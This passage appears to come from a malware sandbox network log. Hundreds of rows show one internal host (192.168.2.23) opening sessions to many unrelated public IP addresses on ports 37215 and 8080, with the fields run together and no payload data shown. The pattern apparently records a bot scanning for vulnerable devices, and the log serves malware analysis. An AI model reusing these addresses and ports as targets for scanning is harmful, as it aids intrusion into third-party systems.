                                                        22658192.168.2.235087441.201.209.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22659192.168.2.233452641.13.69.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22660192.168.2.2359560197.190.18.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22661192.168.2.234310041.105.40.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22662192.168.2.2352932197.38.249.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22663192.168.2.2352876157.143.25.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22664192.168.2.2340722190.209.185.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22665192.168.2.2352372197.203.174.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22666192.168.2.2347750157.5.30.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22667192.168.2.2347916197.64.58.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22668192.168.2.235790641.207.45.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22669192.168.2.2349796157.120.162.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22670192.168.2.2342180157.87.19.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22671192.168.2.234997635.159.77.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22672192.168.2.2336282157.134.15.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22673192.168.2.2360706148.254.217.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22674192.168.2.2342210197.85.60.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22675192.168.2.235593041.88.199.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22676192.168.2.234829641.93.52.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22677192.168.2.2360980157.231.29.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22678192.168.2.2349074197.198.151.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22679192.168.2.2355162197.193.137.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22680192.168.2.2339036197.64.201.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22681192.168.2.2341968197.202.91.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22682192.168.2.234702858.40.138.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22683192.168.2.235107041.111.200.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22684192.168.2.2348152157.8.255.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22685192.168.2.235369282.255.237.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22686192.168.2.2353166197.30.167.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22687192.168.2.235697074.23.233.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22688192.168.2.2348572197.7.194.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22689192.168.2.2335864197.13.203.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22690192.168.2.2356258197.50.85.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22691192.168.2.233872641.10.80.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22692192.168.2.2354316157.235.1.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22693192.168.2.2348708157.156.118.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22694192.168.2.235448279.126.128.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22695192.168.2.2332776162.194.145.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22696192.168.2.2352072113.137.97.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22697192.168.2.235032647.67.83.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22698192.168.2.2340188128.148.126.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22699192.168.2.2348892163.197.126.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22700192.168.2.2343386176.93.116.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22701192.168.2.2354398143.250.115.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22702192.168.2.235427039.235.223.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22703192.168.2.2339032200.6.68.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22704192.168.2.234610675.68.72.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22705192.168.2.2342938212.81.143.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22706192.168.2.23509569.167.114.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22707192.168.2.2333764130.140.224.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22708192.168.2.235575278.89.5.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22709192.168.2.234320489.1.169.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22710192.168.2.2357490100.35.41.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22711192.168.2.2354204204.45.254.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22712192.168.2.233364073.65.140.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22713192.168.2.23501309.204.165.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22714192.168.2.235457290.194.145.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22715192.168.2.2346388186.25.92.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22716192.168.2.2333672147.204.255.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22717192.168.2.2359532162.223.9.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22718192.168.2.235614218.178.47.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22719192.168.2.2348202158.108.247.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22720192.168.2.2350316129.90.72.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22721192.168.2.233607437.213.210.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22722192.168.2.2342946210.129.36.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22723192.168.2.2347816179.56.247.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22724192.168.2.2359800178.218.83.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22725192.168.2.2359440134.168.162.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22726192.168.2.2346058176.106.167.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22727192.168.2.2337912104.115.89.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22728192.168.2.2334840137.196.175.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22729192.168.2.2336704103.14.61.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22730192.168.2.2358500160.66.121.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22731192.168.2.235675253.146.238.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22732192.168.2.236030472.198.251.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22733192.168.2.2353512207.161.102.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22734192.168.2.2340774207.36.6.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22735192.168.2.2347212207.72.177.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22736192.168.2.233348823.77.137.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22737192.168.2.2352748190.157.227.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22738192.168.2.2355154190.189.29.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22739192.168.2.234291664.115.123.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22740192.168.2.2353654102.62.184.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22741192.168.2.235929691.45.37.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22742192.168.2.2356132199.91.243.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22743192.168.2.233482661.67.203.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22744192.168.2.2347594104.215.157.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22745192.168.2.2353010146.195.218.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22746192.168.2.2359620181.77.255.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22747192.168.2.2352284186.52.123.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22748192.168.2.2342394165.63.1.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22749192.168.2.235272870.57.160.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22750192.168.2.2336250161.210.68.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22751192.168.2.235687067.158.248.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22752192.168.2.234033212.191.69.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22753192.168.2.23592145.87.121.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22754192.168.2.234724444.255.6.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22755192.168.2.2356414107.7.192.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22756192.168.2.233321269.237.191.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22757192.168.2.234054853.201.26.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22758192.168.2.235891827.245.80.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22759192.168.2.234581476.255.58.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22760192.168.2.234872886.184.152.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22761192.168.2.2353056198.198.198.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22762192.168.2.2356996174.167.240.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22763192.168.2.234595091.116.134.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22764192.168.2.2341896115.59.72.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22765192.168.2.235805817.71.155.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22766192.168.2.2357674173.169.27.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22767192.168.2.234931442.186.75.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22768192.168.2.2358836206.47.239.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22769192.168.2.233890449.22.124.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22770192.168.2.2336132188.164.116.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22771192.168.2.2345076128.40.244.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22772192.168.2.2353196178.57.227.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22773192.168.2.2343878133.25.138.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22774192.168.2.23493788.115.197.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22775192.168.2.2341920130.209.168.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22776192.168.2.2345526211.79.247.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22777192.168.2.2352724131.5.54.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22778192.168.2.2337810146.138.11.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22779192.168.2.2337970167.143.67.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22780192.168.2.2342516164.104.207.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22781192.168.2.234576053.210.70.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22782192.168.2.2348894145.87.46.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22783192.168.2.234016278.165.142.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22784192.168.2.2349610139.72.35.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22785192.168.2.2345346112.1.133.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22786192.168.2.2360708173.91.221.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22787192.168.2.235754012.1.192.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22788192.168.2.2346556102.5.215.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22789192.168.2.235452434.71.9.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22790192.168.2.2357412126.76.146.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22791192.168.2.234156450.186.97.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22792192.168.2.2335460111.134.244.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22793192.168.2.2357508101.255.54.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22794192.168.2.233885086.187.118.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22795192.168.2.2346594125.181.47.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22796192.168.2.2358382113.82.219.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22797192.168.2.2348004101.135.166.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22798192.168.2.2339116195.125.79.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22799192.168.2.2360462177.249.173.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22800192.168.2.2350392110.41.116.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22801192.168.2.2351432168.220.206.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22802192.168.2.234706443.53.197.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22803192.168.2.2339782193.92.190.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22804192.168.2.2351784142.190.186.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22805192.168.2.236049682.133.94.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22806192.168.2.2352056196.163.254.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22807192.168.2.2350784136.251.2.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22808192.168.2.2338152153.98.154.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22809192.168.2.2349222148.0.159.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22810192.168.2.2334808108.204.32.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22811192.168.2.235766467.83.79.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22812192.168.2.2347070130.200.69.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22813192.168.2.234142437.196.167.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22814192.168.2.234909459.21.223.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22815192.168.2.234320097.205.31.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22816192.168.2.2342450118.83.184.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22817192.168.2.2347042122.152.23.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22818192.168.2.235535231.110.41.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22819192.168.2.23496341.228.227.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22820192.168.2.2344664154.197.249.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22821192.168.2.2343504104.200.211.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22822192.168.2.2345562135.213.230.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22823192.168.2.235921634.210.115.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22824192.168.2.2350096212.81.90.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22825192.168.2.2350802220.214.194.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22826192.168.2.2347210132.135.167.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22827192.168.2.2338632201.26.249.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22828192.168.2.2333520213.201.147.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22829192.168.2.234743080.185.239.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22830192.168.2.2351224136.86.100.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22831192.168.2.235389484.162.22.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22832192.168.2.2347420186.16.205.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22833192.168.2.2342252141.129.219.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22834192.168.2.2352202142.231.62.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22835192.168.2.23468981.95.200.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22836192.168.2.2346040156.26.140.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22837192.168.2.2338564161.144.207.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22838192.168.2.2351462158.213.146.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22839192.168.2.2358794131.53.113.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22840192.168.2.2342056154.188.3.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22841192.168.2.2340794120.18.29.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22842192.168.2.2354498164.135.138.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22843192.168.2.233608676.101.218.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22844192.168.2.2333256142.222.220.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22845192.168.2.2347588142.86.154.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22846192.168.2.2340054117.206.98.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22847192.168.2.2350930210.10.161.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22848192.168.2.2334786143.27.169.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22849192.168.2.2345642216.60.34.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22850192.168.2.2345916189.35.25.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22851192.168.2.233901267.164.226.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22852192.168.2.234081069.71.108.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22853192.168.2.234767876.180.52.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22854192.168.2.233318275.219.183.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22855192.168.2.234885671.233.194.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22856192.168.2.2349968107.104.67.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22857192.168.2.2339806131.27.155.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22858192.168.2.2350988168.192.201.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22859192.168.2.2340266181.30.74.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22860192.168.2.2352306120.223.80.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22861192.168.2.2340870188.43.222.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22862192.168.2.2345564223.133.234.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22863192.168.2.2356874123.30.45.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22864192.168.2.233284846.173.27.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22865192.168.2.2333942118.4.210.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22866192.168.2.2346922159.144.128.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22867192.168.2.2339216222.166.211.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
